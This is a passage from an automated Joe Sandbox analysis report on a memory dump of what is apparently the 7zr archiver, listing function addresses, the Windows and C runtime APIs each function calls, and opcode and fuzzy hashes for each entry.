                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID:
                                    • API String ID: 1532160333-0
                                    • Opcode ID: 4d2b4b5f3b62686f6fe2747bb31c8213ae87d161bd4688fc784e4d02290cc2af
                                    • Instruction ID: d6802559de0e354ec1834c1942affdb036ded9e0c9f8cfe543ad25974326284c
                                    • Opcode Fuzzy Hash: 4d2b4b5f3b62686f6fe2747bb31c8213ae87d161bd4688fc784e4d02290cc2af
                                    • Instruction Fuzzy Hash: 96214AB1946B90CFC721CF6B82D1686FFF4BB19600B94996EC0DA83B12C770A548CF55
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A2C0B8
                                      • Part of subcall function 00A17193: __EH_prolog.LIBCMT ref: 00A17198
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$free
                                    • String ID:
                                    • API String ID: 2654054672-0
                                    • Opcode ID: 41fc52114b5e748d73c10fd6ba0acacfb503873e4a5a881dcc523d742406ca44
                                    • Instruction ID: 765bcd889c9dbd6c4d5f12c033e35f5721c3980d211bad0fb419d40cf8fa1eb4
                                    • Opcode Fuzzy Hash: 41fc52114b5e748d73c10fd6ba0acacfb503873e4a5a881dcc523d742406ca44
                                    • Instruction Fuzzy Hash: 00F0B472A04225DBDB259B49E9417AEF3A9EF54760F20013FE50597612CBB19C408694
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A30364
                                      • Part of subcall function 00A301C4: __EH_prolog.LIBCMT ref: 00A301C9
                                      • Part of subcall function 00A30143: __EH_prolog.LIBCMT ref: 00A30148
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                      • Part of subcall function 00A303D8: __EH_prolog.LIBCMT ref: 00A303DD
                                      • Part of subcall function 00A3004A: __EH_prolog.LIBCMT ref: 00A3004F
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$free
                                    • String ID:
                                    • API String ID: 2654054672-0
                                    • Opcode ID: 19acecdf7342cb29e6ee8a7899e5e100832421161614807fc4c32d3bdc40a705
                                    • Instruction ID: c4977e8a765bfa437501962bdeab5fb3c1b946aeaa87fccb15832ccb86cf76de
                                    • Opcode Fuzzy Hash: 19acecdf7342cb29e6ee8a7899e5e100832421161614807fc4c32d3bdc40a705
                                    • Instruction Fuzzy Hash: 77F02830914B54DFCB19FB68D5227ADBBE4EF00314F10465DF056632D2CBB45B048749
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 8e4c78a7fb1d3e78bba8e71866b33d77047bbb533cd9f6f4c9a7767c415cb53e
                                    • Instruction ID: cce0a1fdcad37e3e077e52c382bbdf1b36a5b26c4d819d291561f6e2b970c3da
                                    • Opcode Fuzzy Hash: 8e4c78a7fb1d3e78bba8e71866b33d77047bbb533cd9f6f4c9a7767c415cb53e
                                    • Instruction Fuzzy Hash: 45F04F72E1112AABCB14EF98D9549AFBB75FF84750B10816AF415E7251CB348A05CB90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID:
                                    • API String ID: 1795875747-0
                                    • Opcode ID: 486f3eb9aa2f7cdf845f3294b94af579fe25db06e95536260e183fccc9cd794d
                                    • Instruction ID: 00f565838dc565182059c4af997c5da846bf3923f9221dd9e3411acae20b6138
                                    • Opcode Fuzzy Hash: 486f3eb9aa2f7cdf845f3294b94af579fe25db06e95536260e183fccc9cd794d
                                    • Instruction Fuzzy Hash: 17D0123250411DABCF156BD4DC05CDD77BCEF08254710441BF545E2150EA75E51587A4
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A480AF
                                      • Part of subcall function 009F1E0C: malloc.MSVCRT ref: 009F1E1F
                                      • Part of subcall function 009F1E0C: _CxxThrowException.MSVCRT(?,00AA4B28), ref: 009F1E39
                                      • Part of subcall function 00A3BDB5: __EH_prolog.LIBCMT ref: 00A3BDBA
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$ExceptionThrowmalloc
                                    • String ID:
                                    • API String ID: 3744649731-0
                                    • Opcode ID: 907fae80e69523663cd4ad6624aff531008f1403b56898bc4b5ec35385d7bda4
                                    • Instruction ID: 9f60761fe5b9ca6261a9f77d9ccb1177a2068f4874d48bf7d72224f5110f21c9
                                    • Opcode Fuzzy Hash: 907fae80e69523663cd4ad6624aff531008f1403b56898bc4b5ec35385d7bda4
                                    • Instruction Fuzzy Hash: F1D01771B11105AFDF08EBB8A52676E72E1AB84340F00457DA016E2681EF7489008660
                                    APIs
                                    • FindClose.KERNELBASE(00000000,?,009F6880), ref: 009F6853
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: CloseFind
                                    • String ID:
                                    • API String ID: 1863332320-0
                                    • Opcode ID: 37b3a01e585993e5d713578495e08b0e81a5733da1e95c1f894039479fb89748
                                    • Instruction ID: d7c925bf9e2454fea484d1545aa2a470d5605b6f8ba6c8aa53f5869e8ab759bd
                                    • Opcode Fuzzy Hash: 37b3a01e585993e5d713578495e08b0e81a5733da1e95c1f894039479fb89748
                                    • Instruction Fuzzy Hash: F5D0123110472146CA645E7D78449E53BDC6E06378331075EF0B0C31E1D7618C835750
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID:
                                    • API String ID: 1795875747-0
                                    • Opcode ID: 592cb9da6c12cbc6aef11620fb26d0c25090bc1f5e807427714e5afbce5555c1
                                    • Instruction ID: c1d87e518bca3c41ccfcd6bd0c19a7834e6b3ce301882792f4c0623f17f0c907
                                    • Opcode Fuzzy Hash: 592cb9da6c12cbc6aef11620fb26d0c25090bc1f5e807427714e5afbce5555c1
                                    • Instruction Fuzzy Hash: CAD0C937108251AFD625AF45EC09C8BBBA5FFD5330725082FF484921609F626C25DAA4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: memmove
                                    • String ID:
                                    • API String ID: 2162964266-0
                                    • Opcode ID: 936375aea008d9b160e0bc1e955f70934edf93ae43960a694541c865fdd6582f
                                    • Instruction ID: 3c4eab65b305df322f893c564580a12f9439bec983c482bf764b547322271b00
                                    • Opcode Fuzzy Hash: 936375aea008d9b160e0bc1e955f70934edf93ae43960a694541c865fdd6582f
                                    • Instruction Fuzzy Hash: BD812EB1D0824EAFCF14CFA8C684AFEBBB5AF48304F14C469E611A7241D775AA84CF50
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                    • Instruction ID: 5d67d45f889917420feabe9fa297392b382477ea15f3b3fac3f508b3308b3d6b
                                    • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                    • Instruction Fuzzy Hash: A2D022B2243A0206CF484F304C0AB2B30842FC130AF28C8BCE81BCB681FB28C2188248
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000), ref: 00A76B31
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: fc8a1f4e083a9aa6c435fc09e8b70d9caca13e6c2401f3b95e2c28e1efc3c361
                                    • Instruction ID: 1818c43c4dda68e4e2c454ed823b419a00ec5d2010431c384d6c9b19b16994ed
                                    • Opcode Fuzzy Hash: fc8a1f4e083a9aa6c435fc09e8b70d9caca13e6c2401f3b95e2c28e1efc3c361
                                    • Instruction Fuzzy Hash: A7C08CE1A4D280DFDF0253508C407603B308B83300F0A00C2E4045B092C6041809C722
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                    • Instruction ID: 1d054a7e450302e399c6c0f5249f1bb3d173dd5adc694076d5f15cc8347a81fd
                                    • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                    • Instruction Fuzzy Hash: 32A024C551104101DD1C33303C017173000135030F7C0C4FC7705C0101F715C1041005
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                    • Instruction ID: 8077a48b9f1ad3ada3fec633518d4a7ebbacffda4665d76e9728f90a74362e1a
                                    • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                    • Instruction Fuzzy Hash: 24A022CCF0200202EE0832383C02BA32033B3F0B0EBE8C8B8B8088020AFF28C0083003
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A76BAC
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 3cc7c2eb240ccbfda306358047fe3fecb941c81deab691efe8bf322a0b8134e4
                                    • Instruction ID: c1205b5edf0e501637edc10c134161863686bde6bd8dc761ec6f6eeadd0b22b5
                                    • Opcode Fuzzy Hash: 3cc7c2eb240ccbfda306358047fe3fecb941c81deab691efe8bf322a0b8134e4
                                    • Instruction Fuzzy Hash: D5A0027C780B40B7ED60A7716D4FF5937347781F15F7085457241690D05EE470559A5C
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                    • Instruction ID: eb40a6c349ce866c388dd55829fae7016b75e61b0abf306a9937754d8fef2156
                                    • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                    • Instruction Fuzzy Hash:
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                    • Instruction ID: 7d1306b5a60df5bae4ea2a5b78d447834102bea88b918e806d7abcfe09572457
                                    • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                    • Instruction Fuzzy Hash: